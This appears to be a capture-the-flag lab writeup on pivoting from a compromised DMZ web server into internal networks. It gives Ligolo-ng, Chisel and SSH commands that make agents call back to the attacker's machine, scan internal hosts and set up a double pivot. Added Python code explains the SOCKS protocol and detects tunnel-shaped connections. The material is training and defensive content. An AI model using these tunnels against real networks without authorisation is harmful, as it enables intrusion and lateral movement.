htb-writeups

Tunneling & Pivoting - Practical Scenario

🎯 Scenario: Internal Network Access

Network Layout

Attacker Machine:   10.10.15.10    (Your Kali Linux)
                    │
                    ↓
Web Server:         172.16.1.10    (Compromised - DMZ)
                    │
                    ↓  
Internal Target:    192.168.1.50   (Can't reach directly)

The Problem

You compromised the web server (172.16.1.10), but you need to access the internal database server (192.168.1.50) which:


🛠️ Solution 1: Ligolo-ng (VPN Style)

On Your Machine (10.10.15.10):

# -selfcert generates a throwaway TLS certificate; -laddr is the address the proxy listens on
./ligolo-ng -selfcert -laddr 0.0.0.0:443

On Web Server (172.16.1.10):

./ligolo-ng_agent -connect 10.10.15.10:443 -ignore-cert

Back on Your Machine:

# In Ligolo interface: select session and type 'start'

# Add route to internal network
sudo ip route add 192.168.1.0/24 dev ligolo

# Now access directly like you're on the internal network
ssh user@192.168.1.50
nmap -sV 192.168.1.50
curl http://192.168.1.50:8080

When to use: Need full network access, multiple hosts, running various tools directly.


🛠️ Solution 2: Chisel SOCKS Proxy

On Your Machine (10.10.15.10):

./chisel server -p 8080 --reverse

On Web Server (172.16.1.10):

./chisel client 10.10.15.10:8080 R:socks

Usage:

# Edit /etc/proxychains.conf: replace the default 'socks4 127.0.0.1 9050' line with 'socks5 127.0.0.1 1080'
# (chisel's R:socks is a SOCKS5 proxy; a socks4 line will not work with it)
proxychains nmap -sT 192.168.1.50   # -sT: only full TCP connections can pass through a SOCKS proxy
proxychains firefox http://192.168.1.50:8080

When to use: Quick SOCKS proxy for tools that support proxies (Burp, nmap, browsers).


🛠️ Solution 3: Chisel Port Forwarding

Forward Specific Service:

# On web server - makes internal 8080 available on your port 9000
./chisel client 10.10.15.10:8080 R:9000:192.168.1.50:8080

Access from your machine:

# Now visit this on YOUR machine
firefox http://127.0.0.1:9000

When to use: Only need one specific service/port from the internal host.


🛠️ Solution 4: SSH Tunneling

Local Port Forward (if you have SSH access to web server):

# On your machine
ssh -L 9000:192.168.1.50:80 user@172.16.1.10

# Access internal web via your localhost:9000
firefox http://127.0.0.1:9000

SSH Dynamic SOCKS:

# On your machine
ssh -D 1080 user@172.16.1.10

# Use with proxychains (same config as Chisel SOCKS; ssh -D accepts both socks4 and socks5 lines)
proxychains nmap -sT 192.168.1.50   # -sT is required: a SYN scan bypasses the proxy entirely

When to use: SSH access is available and you want a living-off-the-land approach.


🎯 Quick Decision Guide

“I need to scan the entire 192.168.1.0/24 network”

# Use Ligolo-ng (direct access) or Chisel SOCKS
./ligolo-ng   # then: nmap 192.168.1.0/24 (real TUN interface, so any scan type works)
# OR
./chisel      # then: proxychains nmap -sT 192.168.1.0/24 (SOCKS only carries TCP connections)

“I just need to access the web app on 192.168.1.50:8080”

# Use Chisel port forwarding (run the client on the web server; YOUR_IP is your attacker machine)
./chisel client YOUR_IP:8080 R:9000:192.168.1.50:8080
firefox http://127.0.0.1:9000

“I have SSH credentials on the web server”

# Use SSH tunneling
ssh -D 1080 user@172.16.1.10
proxychains firefox http://192.168.1.50:8080

⚡ Pro Tips for This Scenario

  1. Ligolo-ng: Remember the route command: sudo ip route add 192.168.1.0/24 dev ligolo
  2. Chisel: Check /etc/proxychains.conf has the correct SOCKS port and version

Chisel creates a SOCKS5 proxy on port 1080 on your local machine (the chisel server side). Edit /etc/proxychains.conf and replace the default Tor line (socks4 127.0.0.1 9050) with one that points at the tunnel. Then put proxychains before any command to route its TCP traffic through the tunnel.

Config line: socks5 127.0.0.1 1080

Usage: proxychains nmap -sT target_ip

  3. SSH: Use -f -N to run in background: ssh -f -N -D 1080 user@host
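Solution 2 and the proxychains tip above both depend on the proxy's SOCKS version: chisel's R:socks speaks SOCKS5 only, while ssh -D accepts SOCKS4 and SOCKS5. The following is an added example, not code from the writeup, showing what proxychains puts on the wire for each config line and why a SOCKS5-only listener refuses a socks4 request before it ever reaches the internal host; all function names are hypothetical helpers.

```python
import ipaddress
import struct

# SOCKS4 CONNECT (original SOCKS4 spec): VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL.
# This is the request proxychains sends for a "socks4 127.0.0.1 1080" config line.
def build_socks4_connect(ip: str, port: int, userid: bytes = b"") -> bytes:
    return struct.pack("!BBH4s", 4, 1, port, ipaddress.IPv4Address(ip).packed) + userid + b"\x00"

# SOCKS5 (RFC 1928) is two steps: method negotiation, then the CONNECT request.
def build_socks5_greeting() -> bytes:
    # VER=5, NMETHODS=1, METHOD=0x00 (no auth), the default for chisel R:socks and ssh -D
    return bytes([5, 1, 0])

def build_socks5_connect(ip: str, port: int) -> bytes:
    # VER=5, CMD=1 (CONNECT), RSV=0, ATYP=1 (IPv4), DST.ADDR, DST.PORT
    return struct.pack("!BBBB4sH", 5, 1, 0, 1, ipaddress.IPv4Address(ip).packed, port)

def socks_version(data: bytes) -> int:
    """The first byte of every SOCKS request is the protocol version (4 or 5)."""
    return data[0] if data else 0

def parse_socks5_connect(data: bytes) -> tuple[str, int]:
    """Server-side view of a SOCKS5-only listener such as chisel's: the version byte is
    checked first, so a SOCKS4 request is refused before the proxy ever touches the
    internal host. Returns (destination, port) for a valid CONNECT."""
    if socks_version(data) != 5:
        raise ValueError(f"unsupported SOCKS version {socks_version(data)}")
    _ver, cmd, _rsv, atyp = struct.unpack("!BBBB", data[:4])
    if cmd != 1:
        raise ValueError(f"only CONNECT (1) is handled here, got command {cmd}")
    if atyp == 1:                                  # IPv4 literal, what proxychains normally sends
        dst = str(ipaddress.IPv4Address(data[4:8]))
        port = struct.unpack("!H", data[8:10])[0]
    elif atyp == 3:                                # domain name: length byte, name, port
        n = data[4]
        dst = data[5:5 + n].decode("ascii")
        port = struct.unpack("!H", data[5 + n:7 + n])[0]
    else:
        raise ValueError(f"address type {atyp} not handled (IPv6 omitted for brevity)")
    return dst, port

def build_socks5_reply(success: bool, bind_ip: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    # VER=5, REP (0 = succeeded, 1 = general failure), RSV, ATYP=1, BND.ADDR, BND.PORT
    return struct.pack("!BBBB4sH", 5, 0 if success else 1, 0, 1,
                       ipaddress.IPv4Address(bind_ip).packed, bind_port)
```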

Test Connection:

# After any method, test with:
ping 192.168.1.50          # Ligolo-ng only: ICMP needs the layer-3 TUN, SOCKS carries TCP only
proxychains curl http://192.168.1.50:8080  # Chisel/SSH SOCKS
curl http://127.0.0.1:9000 # Port forwarding

Choose based on your needs: Full network access → Ligolo-ng, Quick proxy → Chisel, Stealth → SSH.

🎯 Extended Scenario: Multi-Layer Internal Network

Complex Network Layout

Attacker Machine:   10.10.15.10    (Your Kali Linux)
                    │
                    ↓
Web Server:         172.16.1.10    (Compromised - DMZ)
                    │
                    ↓  
Internal Network 1: 192.168.1.0/24 (Database Server: 192.168.1.50)
                    │
                    ↓
Internal Network 2: 10.1.1.0/24    (Deep Internal: 10.1.1.100)

The Challenge

You compromised the web server (172.16.1.10), but need to reach:


🛠️ Solution 1: Ligolo-ng (Advanced VPN Style)

Initial Setup

On Your Machine (10.10.15.10):

# Download from: https://github.com/nicocha30/ligolo-ng
./ligolo-ng -selfcert -laddr 0.0.0.0:443   # -selfcert: throwaway TLS cert, -laddr: listening address

On Web Server (172.16.1.10):

# Upload ligolo-ng agent to compromised server
./ligolo-ng_agent -connect 10.10.15.10:443 -ignore-cert

Basic Pivoting Setup

Back on Your Machine (Ligolo Interface):

# List available sessions
session
# Select the web server session
session 1
# Start the tunnel
start

# Add route to first internal network
sudo ip route add 192.168.1.0/24 dev ligolo

# Test connectivity
ping 192.168.1.50
nmap -sS 192.168.1.50

🎯 Advanced: Double Pivoting with Ligolo-ng

Step 1: Compromise Second Host

# From your machine, through ligolo tunnel
ssh user@192.168.1.50

# Upload ligolo agent to the second pivot (192.168.1.50)
scp ligolo-ng_agent user@192.168.1.50:/tmp/

Step 2: Create Listener for Second Pivot

On Your Ligolo Interface (with session 1, the web server, still selected):

# Open a listener on the web server agent and relay it back to your proxy port (443 above)
listener_add --addr 0.0.0.0:4443 --to 127.0.0.1:443 --tcp

# Check listeners
listener_list

Step 3: Connect Second Agent

On Second Pivot (192.168.1.50):

# 192.168.1.50 cannot reach 10.10.15.10 directly, so it connects to the listener on the
# first pivot, which relays the session back to your proxy
./ligolo-ng_agent -connect 172.16.1.10:4443 -ignore-cert

Step 4: Configure Double Pivot

Back on Your Ligolo Interface:

# List all sessions
session
# You should see both:
# Session 1: Web Server (172.16.1.10)
# Session 2: Internal Host (192.168.1.50)

# Each tunnel needs its own TUN interface (recent ligolo-ng versions):
# create a second one, select session 2 and start it there
interface_create --name ligolo2
session 2
start --tun ligolo2

# Add route to deepest network via the second interface
sudo ip route add 10.1.1.0/24 dev ligolo2

# Now you can access all networks directly!
nmap -sS 10.1.1.100
ssh admin@10.1.1.100

Ligolo-ng Advanced Commands

# In Ligolo interface:
session          # List all sessions
session <id>     # Select session
info             # Show session details
stop             # Stop current tunnel
ifconfig         # Show interface info
listener_list    # Show all listeners
listener_stop <id>  # Stop listener

# Network configuration
sudo ip route del 192.168.1.0/24 dev ligolo  # Remove route
sudo ip route show | grep ligolo             # Show ligolo routes
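The tunnels in Solutions 1 to 3 and the double pivot above all leave the same trace for a blue team: a long-lived, busy TCP session from a DMZ or internal host to somewhere it has no business talking to. The following is an added detection example, not part of the writeup, run over a constructed conn.log-style sample; the networks, published ports and thresholds are assumptions for this scenario.

```python
import ipaddress

# Constructed sample shaped like Zeek conn.log fields (not captured from any real network):
# ts orig_ip orig_port resp_ip resp_port proto duration_s orig_bytes resp_bytes
SAMPLE_CONN_LOG = """\
1700000000.1 172.16.1.10 40112 10.10.15.10 443 tcp 5400.0 2200000 1900000
1700000001.2 172.16.1.10 40118 172.16.1.20 53 udp 0.1 70 140
1700000002.3 172.16.1.10 40120 10.10.15.10 8080 tcp 3600.0 800000 650000
1700000003.4 192.168.1.50 51002 172.16.1.10 4443 tcp 4100.0 1500000 1200000
1700000004.5 172.16.1.10 40130 203.0.113.9 443 tcp 2.0 900 4200
1700000005.6 192.168.1.50 51010 172.16.1.10 443 tcp 1.5 600 3100
"""

# Network model for this page's scenario; the thresholds are assumptions, tune them to your data.
MONITORED = [ipaddress.ip_network(n) for n in ("172.16.1.0/24", "192.168.1.0/24", "10.1.1.0/24")]
DMZ = ipaddress.ip_network("172.16.1.0/24")
PUBLISHED_DMZ_PORTS = {80, 443}       # what the web server is expected to serve
LONG_LIVED_S = 600.0                  # an agent stays connected for the whole session
MIN_BYTES_EACH_WAY = 100_000          # proxied traffic flows in both directions

def parse_conn_log(text: str) -> list[dict]:
    rows = []
    for line in text.splitlines():
        ts, oip, oport, rip, rport, proto, dur, ob, rb = line.split()
        rows.append(dict(orig=ipaddress.ip_address(oip), resp=ipaddress.ip_address(rip),
                         resp_port=int(rport), proto=proto, duration=float(dur),
                         orig_bytes=int(ob), resp_bytes=int(rb)))
    return rows

def find_tunnel_candidates(rows: list[dict]) -> list[tuple[str, str, int, str]]:
    """Return (orig, resp, resp_port, reason) for connections shaped like pivot tunnels."""
    hits = []
    for r in rows:
        busy = min(r["orig_bytes"], r["resp_bytes"]) >= MIN_BYTES_EACH_WAY
        if r["proto"] != "tcp" or r["duration"] < LONG_LIVED_S or not busy:
            continue
        if not any(r["resp"] in net for net in MONITORED):
            # A monitored host holding a long, busy session to an outside address is the shape of a
            # reverse agent (ligolo-ng agent -connect, chisel client) keeping its tunnel up.
            hits.append((str(r["orig"]), str(r["resp"]), r["resp_port"], "long-lived outbound session"))
        elif r["resp"] in DMZ and r["resp_port"] not in PUBLISHED_DMZ_PORTS:
            # An internal host talking to the DMZ box on a port it does not publish matches a
            # listener opened on the first pivot to relay a second-stage agent.
            hits.append((str(r["orig"]), str(r["resp"]), r["resp_port"], "unexpected DMZ port from inside"))
    return hits

def scan_sample() -> list[tuple[str, str, int, str]]:
    return find_tunnel_candidates(parse_conn_log(SAMPLE_CONN_LOG))
```

The same two rules apply to SSH -D and -L tunnels, since from the network's point of view they are just one more long-lived TCP session from the pivot host.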